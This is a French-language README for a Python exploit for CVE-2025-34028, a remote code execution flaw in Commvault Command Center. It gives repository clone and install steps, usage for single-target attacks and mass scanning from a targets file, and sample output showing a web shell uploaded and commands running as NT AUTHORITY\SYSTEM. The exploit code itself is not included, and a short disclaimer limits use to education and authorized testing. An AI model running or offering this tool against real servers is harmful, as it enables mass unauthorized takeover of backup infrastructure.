
Preuve de concept (PoC) pour CVE-2025-34028, une vulnérabilité d'exécution de code à distance dans Commvault Command Center. Ce script Python analyse une ou plusieurs cibles, exécute des commandes et signale les hôtes vulnérables.
Un exploit Python pour CVE-2025-34028, une vulnérabilité d'exécution de code à distance dans Commvault Command Center. Cet outil permet de tester des cibles uniques ou de scanner plusieurs hôtes en masse.
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
Installez les dépendances avec :
pip install requests tabulate
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)
CVE-2025-34028 Commvault RCE Exploit
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Single target URL (e.g., https://192.168.1.100:8000)
-f TARGETS_FILE, --file TARGETS_FILE
File containing multiple targets, one per line
Test d'une cible unique :
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
Scan de plusieurs cibles à partir d'un fichier :
python CVE-2025-34028-Commvault.py -f targets.txt
Le fichier de cibles doit contenir une cible par ligne au format :
https://host:port
http://ip
Exemple de targets.txt :
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
Le script fournit :
Exemple de sortie :
CVE-2025-34028 Commvault RCE PoC
[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM
[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index | URL | Status | System User |
+---------+------------------------------+---------------------+------------------+
| 1 | https://cvtest.example.com:8000 | RCE Successful | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+
Cet outil est destiné uniquement à des fins éducatives et à des tests autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce programme.
Licence MIT - Voir le fichier LICENSE pour plus de détails